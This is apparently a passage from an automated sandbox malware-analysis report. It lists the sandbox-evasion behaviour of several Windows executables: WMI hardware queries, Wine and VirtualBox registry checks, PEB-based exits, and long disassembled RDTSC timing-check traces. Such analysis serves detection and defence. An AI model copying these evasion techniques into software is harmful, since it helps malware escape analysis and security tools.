                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Found API chain indicative of sandbox detection
                            Source: C:\Users\user\Desktop\random.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-95837
                            Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Query firmware table information (likely to detect VMs)
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSystem information queried: FirmwareTableInformation
                            Tries to detect sandboxes / dynamic malware analysis system (registry check)
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                            Tries to detect virtualization through RDTSC time measurements
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: BEF3FF second address: BEF403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: BEF403 second address: BEF40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: BEF40C second address: BEF41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 jnc 00007F3430D3ED3Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: BEF41C second address: BEECC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 jne 00007F3430D3497Ch 0x0000000c push dword ptr [ebp+122D02E9h] 0x00000012 jg 00007F3430D3498Ch 0x00000018 pushad 0x00000019 movsx esi, si 0x0000001c jmp 00007F3430D34981h 0x00000021 popad 0x00000022 call dword ptr [ebp+122D1DFEh] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D2013h], eax 0x0000002f jg 00007F3430D3497Fh 0x00000035 pushad 0x00000036 cmc 0x00000037 add dword ptr [ebp+122D2013h], ecx 0x0000003d popad 0x0000003e xor eax, eax 0x00000040 mov dword ptr [ebp+122D2013h], eax 0x00000046 mov edx, dword ptr [esp+28h] 0x0000004a mov dword ptr [ebp+122D1DE8h], edi 0x00000050 jmp 00007F3430D34989h 0x00000055 mov dword ptr [ebp+122D3838h], eax 0x0000005b mov dword ptr [ebp+122D1E0Dh], ecx 0x00000061 mov esi, 0000003Ch 0x00000066 or dword ptr [ebp+122D1E3Fh], ecx 0x0000006c jp 00007F3430D3498Fh 0x00000072 jmp 00007F3430D34989h 0x00000077 add esi, dword ptr [esp+24h] 0x0000007b jmp 00007F3430D34981h 0x00000080 lodsw 0x00000082 sub dword ptr [ebp+122D30CDh], edx 0x00000088 add eax, dword ptr [esp+24h] 0x0000008c jmp 00007F3430D34986h 0x00000091 mov ebx, dword ptr [esp+24h] 0x00000095 stc 0x00000096 push eax 0x00000097 push eax 0x00000098 push edx 0x00000099 pushad 0x0000009a jns 00007F3430D34976h 0x000000a0 jo 00007F3430D34976h 0x000000a6 popad 0x000000a7 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: BEECC1 second address: BEECC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D6A4F8 second address: D6A504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3430D34976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D6A504 second address: D6A516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 jg 00007F3430D3ED52h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D6A516 second address: D6A521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D72FF4 second address: D73001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F3430D3ED3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D73089 second address: D730A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F3430D3497Ch 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D730A5 second address: D730AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D730AC second address: D73167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F3430D34976h 0x00000009 jmp 00007F3430D34982h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jmp 00007F3430D34981h 0x00000019 jmp 00007F3430D3497Bh 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 jmp 00007F3430D34988h 0x00000029 jl 00007F3430D34978h 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 pop eax 0x00000033 jnl 00007F3430D3497Ah 0x00000039 push 00000003h 0x0000003b jp 00007F3430D34985h 0x00000041 jmp 00007F3430D3497Fh 0x00000046 adc edi, 0AA0BFB0h 0x0000004c push 00000000h 0x0000004e stc 0x0000004f push 00000003h 0x00000051 pushad 0x00000052 jmp 00007F3430D34987h 0x00000057 movzx eax, bx 0x0000005a popad 0x0000005b push 898994A8h 0x00000060 jo 00007F3430D3497Eh 0x00000066 push edi 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D73167 second address: D7319E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 xor dword ptr [esp], 498994A8h 0x0000000c cmc 0x0000000d lea ebx, dword ptr [ebp+12457F25h] 0x00000013 je 00007F3430D3ED3Ah 0x00000019 mov dx, 7016h 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3430D3ED47h 0x00000025 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D7319E second address: D731BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34986h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D7329E second address: D732A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3430D3ED36h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D732A8 second address: D732E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e jmp 00007F3430D34981h 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jo 00007F3430D34980h 0x0000001e pushad 0x0000001f jnp 00007F3430D34976h 0x00000025 push eax 0x00000026 pop eax 0x00000027 popad 0x00000028 mov eax, dword ptr [eax] 0x0000002a push ecx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D7339D second address: D733A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D733A1 second address: D733A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D91D25 second address: D91D30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F3430D3ED36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D91D30 second address: D91D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D91D3E second address: D91D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3430D3ED36h 0x0000000a pop edx 0x0000000b pushad 0x0000000c je 00007F3430D3ED36h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D91EAE second address: D91EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D34985h 0x00000009 jmp 00007F3430D3497Dh 0x0000000e jmp 00007F3430D3497Ch 0x00000013 popad 0x00000014 jng 00007F3430D3497Ah 0x0000001a popad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D91EF1 second address: D91EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D91EF5 second address: D91F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D34984h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D921BC second address: D921D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3430D3ED41h 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D92365 second address: D9236A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D9236A second address: D92374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F3430D3ED36h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D92374 second address: D9239B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3497Ah 0x00000007 jbe 00007F3430D34976h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F3430D3497Fh 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D92676 second address: D92684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 ja 00007F3430D3ED36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D92684 second address: D92689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D927FA second address: D927FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D927FE second address: D92824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34988h 0x00000007 jns 00007F3430D34976h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D92824 second address: D92828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D930CA second address: D930D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D930D8 second address: D930DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D93A5B second address: D93A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D9670E second address: D96715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D96715 second address: D9671B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D9671B second address: D9671F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D9671F second address: D96744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F3430D34982h 0x00000011 jnc 00007F3430D34976h 0x00000017 popad 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D68A56 second address: D68A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3430D3ED36h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jl 00007F3430D3ED36h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA0402 second address: DA041E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D66EE4 second address: D66EE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D66EE8 second address: D66EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D9FBC5 second address: D9FBCB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D9FFDF second address: D9FFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F3430D34982h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA187E second address: DA18AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3430D3ED36h 0x0000000a popad 0x0000000b pop ebx 0x0000000c xor dword ptr [esp], 7CB9E9B2h 0x00000013 push ecx 0x00000014 mov esi, edi 0x00000016 pop edi 0x00000017 push 265AEA0Bh 0x0000001c pushad 0x0000001d pushad 0x0000001e jne 00007F3430D3ED36h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 jng 00007F3430D3ED3Ch 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA19C6 second address: DA19CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA24DA second address: DA24DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA24DE second address: DA24E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA24E4 second address: DA2508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a sub dword ptr [ebp+122D1FA4h], eax 0x00000010 push eax 0x00000011 push edi 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA384E second address: DA3852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA3852 second address: DA386F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA386F second address: DA388A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3430D34986h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA6919 second address: DA6976 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3430D3ED3Bh 0x00000008 jnp 00007F3430D3ED36h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 xor esi, 4D0E793Fh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F3430D3ED38h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000017h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov dword ptr [ebp+122D1E55h], esi 0x0000003e jg 00007F3430D3ED39h 0x00000044 push eax 0x00000045 jo 00007F3430D3ED44h 0x0000004b push eax 0x0000004c push edx 0x0000004d push edx 0x0000004e pop edx 0x0000004f rdtsc
